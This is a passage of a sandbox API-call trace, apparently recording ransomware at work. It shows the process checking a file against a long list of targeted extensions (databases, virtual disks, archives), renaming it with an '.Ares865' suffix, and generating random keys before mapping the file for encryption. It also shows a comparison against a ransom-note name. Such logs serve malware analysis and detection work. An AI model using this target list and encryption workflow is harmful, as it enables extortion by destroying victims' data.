4 [0089.850] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".dll") returned 1 [0089.850] lstrlenW (lpString=".lnk") returned 4 [0089.850] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".lnk") returned 1 [0089.850] lstrlenW (lpString=".ini") returned 4 [0089.850] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".ini") returned 1 [0089.850] lstrlenW (lpString=".sys") returned 4 [0089.850] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".sys") returned 1 [0089.850] lstrlenW (lpString="Help_MValidator.H1D") returned 19 [0089.850] lstrlenW (lpString="bak") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="bak") returned 1 [0089.850] lstrlenW (lpString="ba_") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="ba_") returned 1 [0089.850] lstrlenW (lpString="dbb") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="dbb") returned 1 [0089.850] lstrlenW (lpString="vmdk") returned 4 [0089.850] lstrcmpiW (lpString1=".H1D", lpString2="vmdk") returned -1 [0089.850] lstrlenW (lpString="rar") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="rar") returned -1 [0089.850] lstrlenW (lpString="zip") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="zip") returned -1 [0089.850] lstrlenW (lpString="tgz") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="tgz") returned -1 [0089.850] lstrlenW (lpString="vbox") returned 4 [0089.850] lstrcmpiW (lpString1=".H1D", lpString2="vbox") returned -1 [0089.850] lstrlenW (lpString="vdi") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="vdi") returned -1 [0089.850] lstrlenW (lpString="vhd") returned 3 [0089.850] lstrcmpiW (lpString1="H1D", lpString2="vhd") returned -1 [0089.850] lstrlenW (lpString="vhdx") returned 4 [0089.850] lstrcmpiW (lpString1=".H1D", lpString2="vhdx") returned -1 [0089.850] lstrlenW (lpString="avhd") returned 4 [0089.851] lstrcmpiW (lpString1=".H1D", lpString2="avhd") returned -1 [0089.851] lstrlenW (lpString="db") returned 2 [0089.851] lstrcmpiW (lpString1="1D", lpString2="db") returned -1 [0089.851] lstrlenW (lpString="db2") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="db2") returned 1 [0089.851] lstrlenW (lpString="db3") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="db3") returned 1 [0089.851] lstrlenW (lpString="dbf") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="dbf") returned 1 [0089.851] lstrlenW (lpString="mdf") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="mdf") returned -1 [0089.851] lstrlenW (lpString="mdb") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="mdb") returned -1 [0089.851] lstrlenW (lpString="sql") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="sql") returned -1 [0089.851] lstrlenW (lpString="sqlite") returned 6 [0089.851] lstrcmpiW (lpString1="or.H1D", lpString2="sqlite") returned -1 [0089.851] lstrlenW (lpString="sqlite3") returned 7 [0089.851] lstrcmpiW (lpString1="tor.H1D", lpString2="sqlite3") returned 1 [0089.851] lstrlenW (lpString="sqlitedb") returned 8 [0089.851] lstrcmpiW (lpString1="ator.H1D", lpString2="sqlitedb") returned -1 [0089.851] lstrlenW (lpString="xml") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="xml") returned -1 [0089.851] lstrlenW (lpString="$er") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="$er") returned 1 [0089.851] lstrlenW (lpString="4dd") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="4dd") returned 1 [0089.851] lstrlenW (lpString="4dl") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="4dl") returned 1 [0089.851] lstrlenW (lpString="^^^") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="^^^") returned 1 [0089.851] lstrlenW (lpString="abs") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="abs") returned 1 [0089.851] lstrlenW (lpString="abx") returned 3 [0089.851] lstrcmpiW (lpString1="H1D", lpString2="abx") returned 1 [0089.851] lstrlenW (lpString="accdb") returned 5 [0089.851] lstrcmpiW (lpString1="r.H1D", lpString2="accdb") returned 1 [0089.851] lstrlenW (lpString="accdc") returned 5 [0089.851] lstrcmpiW (lpString1="r.H1D", lpString2="accdc") returned 1 [0089.852] lstrlenW (lpString="accde") returned 5 [0089.852] lstrcmpiW (lpString1="r.H1D", lpString2="accde") returned 1 [0089.852] lstrlenW (lpString="accdr") returned 5 [0089.852] lstrcmpiW (lpString1="r.H1D", lpString2="accdr") returned 1 [0089.852] lstrlenW (lpString="accdt") returned 5 [0089.852] lstrcmpiW (lpString1="r.H1D", lpString2="accdt") returned 1 [0089.852] lstrlenW (lpString="accdw") returned 5 [0089.852] lstrcmpiW (lpString1="r.H1D", lpString2="accdw") returned 1 [0089.852] lstrlenW (lpString="accft") returned 5 [0089.852] lstrcmpiW (lpString1="r.H1D", lpString2="accft") returned 1 [0089.852] lstrlenW (lpString="adb") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="adb") returned 1 [0089.852] lstrlenW (lpString="adb") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="adb") returned 1 [0089.852] lstrlenW (lpString="ade") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="ade") returned 1 [0089.852] lstrlenW (lpString="adf") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="adf") returned 1 [0089.852] lstrlenW (lpString="adn") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="adn") returned 1 [0089.852] lstrlenW (lpString="adp") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="adp") returned 1 [0089.852] lstrlenW (lpString="alf") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="alf") returned 1 [0089.852] lstrlenW (lpString="ask") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="ask") returned 1 [0089.852] lstrlenW (lpString="btr") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="btr") returned 1 [0089.852] lstrlenW (lpString="cat") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="cat") returned 1 [0089.852] lstrlenW (lpString="cdb") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="cdb") returned 1 [0089.852] lstrlenW (lpString="ckp") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="ckp") returned 1 [0089.852] lstrlenW (lpString="cma") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="cma") returned 1 [0089.852] lstrlenW (lpString="cpd") returned 3 [0089.852] lstrcmpiW (lpString1="H1D", lpString2="cpd") returned 1 [0089.852] lstrlenW (lpString="dacpac") returned 6 [0089.853] lstrcmpiW (lpString1="or.H1D", lpString2="dacpac") returned 1 [0089.853] lstrlenW (lpString="dad") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dad") returned 1 [0089.853] lstrlenW (lpString="dadiagrams") returned 10 [0089.853] lstrcmpiW (lpString1="idator.H1D", lpString2="dadiagrams") returned 1 [0089.853] lstrlenW (lpString="daschema") returned 8 [0089.853] lstrcmpiW (lpString1="ator.H1D", lpString2="daschema") returned -1 [0089.853] lstrlenW (lpString="db-journal") returned 10 [0089.853] lstrcmpiW (lpString1="idator.H1D", lpString2="db-journal") returned 1 [0089.853] lstrlenW (lpString="db-shm") returned 6 [0089.853] lstrcmpiW (lpString1="or.H1D", lpString2="db-shm") returned 1 [0089.853] lstrlenW (lpString="db-wal") returned 6 [0089.853] lstrcmpiW (lpString1="or.H1D", lpString2="db-wal") returned 1 [0089.853] lstrlenW (lpString="dbc") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dbc") returned 1 [0089.853] lstrlenW (lpString="dbs") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dbs") returned 1 [0089.853] lstrlenW (lpString="dbt") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dbt") returned 1 [0089.853] lstrlenW (lpString="dbv") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dbv") returned 1 [0089.853] lstrlenW (lpString="dbx") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dbx") returned 1 [0089.853] lstrlenW (lpString="dcb") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dcb") returned 1 [0089.853] lstrlenW (lpString="dct") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dct") returned 1 [0089.853] lstrlenW (lpString="dcx") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dcx") returned 1 [0089.853] lstrlenW (lpString="ddl") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="ddl") returned 1 [0089.853] lstrlenW (lpString="dlis") returned 4 [0089.853] lstrcmpiW (lpString1=".H1D", lpString2="dlis") returned -1 [0089.853] lstrlenW (lpString="dp1") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dp1") returned 1 [0089.853] lstrlenW (lpString="dqy") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dqy") returned 1 [0089.853] lstrlenW (lpString="dsk") returned 3 [0089.853] lstrcmpiW (lpString1="H1D", lpString2="dsk") returned 1 [0089.854] lstrlenW (lpString="dsn") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="dsn") returned 1 [0089.854] lstrlenW (lpString="dtsx") returned 4 [0089.854] lstrcmpiW (lpString1=".H1D", lpString2="dtsx") returned -1 [0089.854] lstrlenW (lpString="dxl") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="dxl") returned 1 [0089.854] lstrlenW (lpString="eco") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="eco") returned 1 [0089.854] lstrlenW (lpString="ecx") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="ecx") returned 1 [0089.854] lstrlenW (lpString="edb") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="edb") returned 1 [0089.854] lstrlenW (lpString="epim") returned 4 [0089.854] lstrcmpiW (lpString1=".H1D", lpString2="epim") returned -1 [0089.854] lstrlenW (lpString="fcd") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fcd") returned 1 [0089.854] lstrlenW (lpString="fdb") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fdb") returned 1 [0089.854] lstrlenW (lpString="fic") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fic") returned 1 [0089.854] lstrlenW (lpString="flexolibrary") returned 12 [0089.854] lstrcmpiW (lpString1="alidator.H1D", lpString2="flexolibrary") returned -1 [0089.854] lstrlenW (lpString="fm5") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fm5") returned 1 [0089.854] lstrlenW (lpString="fmp") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fmp") returned 1 [0089.854] lstrlenW (lpString="fmp12") returned 5 [0089.854] lstrcmpiW (lpString1="r.H1D", lpString2="fmp12") returned 1 [0089.854] lstrlenW (lpString="fmpsl") returned 5 [0089.854] lstrcmpiW (lpString1="r.H1D", lpString2="fmpsl") returned 1 [0089.854] lstrlenW (lpString="fol") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fol") returned 1 [0089.854] lstrlenW (lpString="fp3") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fp3") returned 1 [0089.854] lstrlenW (lpString="fp4") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fp4") returned 1 [0089.854] lstrlenW (lpString="fp5") returned 3 [0089.854] lstrcmpiW (lpString1="H1D", lpString2="fp5") returned 1 [0089.854] lstrlenW (lpString="fp7") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="fp7") returned 1 [0089.855] lstrlenW (lpString="fpt") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="fpt") returned 1 [0089.855] lstrlenW (lpString="frm") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="frm") returned 1 [0089.855] lstrlenW (lpString="gdb") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="gdb") returned 1 [0089.855] lstrlenW (lpString="gdb") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="gdb") returned 1 [0089.855] lstrlenW (lpString="grdb") returned 4 [0089.855] lstrcmpiW (lpString1=".H1D", lpString2="grdb") returned -1 [0089.855] lstrlenW (lpString="gwi") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="gwi") returned 1 [0089.855] lstrlenW (lpString="hdb") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="hdb") returned -1 [0089.855] lstrlenW (lpString="his") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="his") returned -1 [0089.855] lstrlenW (lpString="ib") returned 2 [0089.855] lstrcmpiW (lpString1="1D", lpString2="ib") returned -1 [0089.855] lstrlenW (lpString="idb") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="idb") returned -1 [0089.855] lstrlenW (lpString="ihx") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="ihx") returned -1 [0089.855] lstrlenW (lpString="itdb") returned 4 [0089.855] lstrcmpiW (lpString1=".H1D", lpString2="itdb") returned -1 [0089.855] lstrlenW (lpString="itw") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="itw") returned -1 [0089.855] lstrlenW (lpString="jet") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="jet") returned -1 [0089.855] lstrlenW (lpString="jtx") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="jtx") returned -1 [0089.855] lstrlenW (lpString="kdb") returned 3 [0089.855] lstrcmpiW (lpString1="H1D", lpString2="kdb") returned -1 [0089.855] lstrlenW (lpString="kexi") returned 4 [0089.855] lstrcmpiW (lpString1=".H1D", lpString2="kexi") returned -1 [0089.855] lstrlenW (lpString="kexic") returned 5 [0089.855] lstrcmpiW (lpString1="r.H1D", lpString2="kexic") returned 1 [0089.855] lstrlenW (lpString="kexis") returned 5 [0089.855] lstrcmpiW (lpString1="r.H1D", lpString2="kexis") returned 1 [0089.856] lstrlenW (lpString="lgc") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="lgc") returned -1 [0089.856] lstrlenW (lpString="lwx") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="lwx") returned -1 [0089.856] lstrlenW (lpString="maf") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="maf") returned -1 [0089.856] lstrlenW (lpString="maq") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="maq") returned -1 [0089.856] lstrlenW (lpString="mar") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mar") returned -1 [0089.856] lstrlenW (lpString="marshal") returned 7 [0089.856] lstrcmpiW (lpString1="tor.H1D", lpString2="marshal") returned 1 [0089.856] lstrlenW (lpString="mas") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mas") returned -1 [0089.856] lstrlenW (lpString="mav") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mav") returned -1 [0089.856] lstrlenW (lpString="maw") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="maw") returned -1 [0089.856] lstrlenW (lpString="mdbhtml") returned 7 [0089.856] lstrcmpiW (lpString1="tor.H1D", lpString2="mdbhtml") returned 1 [0089.856] lstrlenW (lpString="mdn") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mdn") returned -1 [0089.856] lstrlenW (lpString="mdt") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mdt") returned -1 [0089.856] lstrlenW (lpString="mfd") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mfd") returned -1 [0089.856] lstrlenW (lpString="mpd") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mpd") returned -1 [0089.856] lstrlenW (lpString="mrg") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mrg") returned -1 [0089.856] lstrlenW (lpString="mud") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mud") returned -1 [0089.856] lstrlenW (lpString="mwb") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="mwb") returned -1 [0089.856] lstrlenW (lpString="myd") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="myd") returned -1 [0089.856] lstrlenW (lpString="ndf") returned 3 [0089.856] lstrcmpiW (lpString1="H1D", lpString2="ndf") returned -1 [0089.856] lstrlenW (lpString="nnt") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="nnt") returned -1 [0089.857] lstrlenW (lpString="nrmlib") returned 6 [0089.857] lstrcmpiW (lpString1="or.H1D", lpString2="nrmlib") returned 1 [0089.857] lstrlenW (lpString="ns2") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="ns2") returned -1 [0089.857] lstrlenW (lpString="ns3") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="ns3") returned -1 [0089.857] lstrlenW (lpString="ns4") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="ns4") returned -1 [0089.857] lstrlenW (lpString="nsf") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="nsf") returned -1 [0089.857] lstrlenW (lpString="nv") returned 2 [0089.857] lstrcmpiW (lpString1="1D", lpString2="nv") returned -1 [0089.857] lstrlenW (lpString="nv2") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="nv2") returned -1 [0089.857] lstrlenW (lpString="nwdb") returned 4 [0089.857] lstrcmpiW (lpString1=".H1D", lpString2="nwdb") returned -1 [0089.857] lstrlenW (lpString="nyf") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="nyf") returned -1 [0089.857] lstrlenW (lpString="odb") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="odb") returned -1 [0089.857] lstrlenW (lpString="odb") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="odb") returned -1 [0089.857] lstrlenW (lpString="oqy") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="oqy") returned -1 [0089.857] lstrlenW (lpString="ora") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="ora") returned -1 [0089.857] lstrlenW (lpString="orx") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="orx") returned -1 [0089.857] lstrlenW (lpString="owc") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="owc") returned -1 [0089.857] lstrlenW (lpString="p96") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="p96") returned -1 [0089.857] lstrlenW (lpString="p97") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="p97") returned -1 [0089.857] lstrlenW (lpString="pan") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="pan") returned -1 [0089.857] lstrlenW (lpString="pdb") returned 3 [0089.857] lstrcmpiW (lpString1="H1D", lpString2="pdb") returned -1 [0089.857] lstrlenW (lpString="pdm") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="pdm") returned -1 [0089.858] lstrlenW (lpString="pnz") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="pnz") returned -1 [0089.858] lstrlenW (lpString="qry") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="qry") returned -1 [0089.858] lstrlenW (lpString="qvd") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="qvd") returned -1 [0089.858] lstrlenW (lpString="rbf") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="rbf") returned -1 [0089.858] lstrlenW (lpString="rctd") returned 4 [0089.858] lstrcmpiW (lpString1=".H1D", lpString2="rctd") returned -1 [0089.858] lstrlenW (lpString="rod") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="rod") returned -1 [0089.858] lstrlenW (lpString="rodx") returned 4 [0089.858] lstrcmpiW (lpString1=".H1D", lpString2="rodx") returned -1 [0089.858] lstrlenW (lpString="rpd") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="rpd") returned -1 [0089.858] lstrlenW (lpString="rsd") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="rsd") returned -1 [0089.858] lstrlenW (lpString="sas7bdat") returned 8 [0089.858] lstrcmpiW (lpString1="ator.H1D", lpString2="sas7bdat") returned -1 [0089.858] lstrlenW (lpString="sbf") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="sbf") returned -1 [0089.858] lstrlenW (lpString="scx") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="scx") returned -1 [0089.858] lstrlenW (lpString="sdb") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="sdb") returned -1 [0089.858] lstrlenW (lpString="sdc") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="sdc") returned -1 [0089.858] lstrlenW (lpString="sdf") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="sdf") returned -1 [0089.858] lstrlenW (lpString="sis") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="sis") returned -1 [0089.858] lstrlenW (lpString="spq") returned 3 [0089.858] lstrcmpiW (lpString1="H1D", lpString2="spq") returned -1 [0089.858] lstrlenW (lpString="te") returned 2 [0089.858] lstrcmpiW (lpString1="1D", lpString2="te") returned -1 [0089.859] lstrlenW (lpString="teacher") returned 7 [0089.859] lstrcmpiW (lpString1="tor.H1D", lpString2="teacher") returned 1 [0089.859] lstrlenW (lpString="tmd") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="tmd") returned -1 [0089.859] lstrlenW (lpString="tps") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="tps") returned -1 [0089.859] lstrlenW (lpString="trc") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="trc") returned -1 [0089.859] lstrlenW (lpString="trc") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="trc") returned -1 [0089.859] lstrlenW (lpString="trm") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="trm") returned -1 [0089.859] lstrlenW (lpString="udb") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="udb") returned -1 [0089.859] lstrlenW (lpString="udl") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="udl") returned -1 [0089.859] lstrlenW (lpString="usr") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="usr") returned -1 [0089.859] lstrlenW (lpString="v12") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="v12") returned -1 [0089.859] lstrlenW (lpString="vis") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="vis") returned -1 [0089.859] lstrlenW (lpString="vpd") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="vpd") returned -1 [0089.859] lstrlenW (lpString="vvv") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="vvv") returned -1 [0089.859] lstrlenW (lpString="wdb") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="wdb") returned -1 [0089.859] lstrlenW (lpString="wmdb") returned 4 [0089.859] lstrcmpiW (lpString1=".H1D", lpString2="wmdb") returned -1 [0089.859] lstrlenW (lpString="wrk") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="wrk") returned -1 [0089.859] lstrlenW (lpString="xdb") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="xdb") returned -1 [0089.859] lstrlenW (lpString="xld") returned 3 [0089.859] lstrcmpiW (lpString1="H1D", lpString2="xld") returned -1 [0089.859] lstrlenW (lpString="xmlff") returned 5 [0089.859] lstrcmpiW (lpString1="r.H1D", lpString2="xmlff") returned -1 [0089.860] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.Ares865") returned 84 [0089.860] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.ares865"), dwFlags=0x1) returned 1 [0089.861] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14660) returned 1 [0089.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.861] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.862] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.862] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.862] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c50, lpName=0x0) returned 0x15c [0089.864] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c50) returned 0x190000 [0089.865] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.866] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.866] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.866] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.867] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.867] CloseHandle (hObject=0x15c) returned 1 [0089.867] CloseHandle (hObject=0x118) returned 1 [0089.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.867] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.867] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0089.867] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="HOW TO BACK YOUR FILES.exe") returned 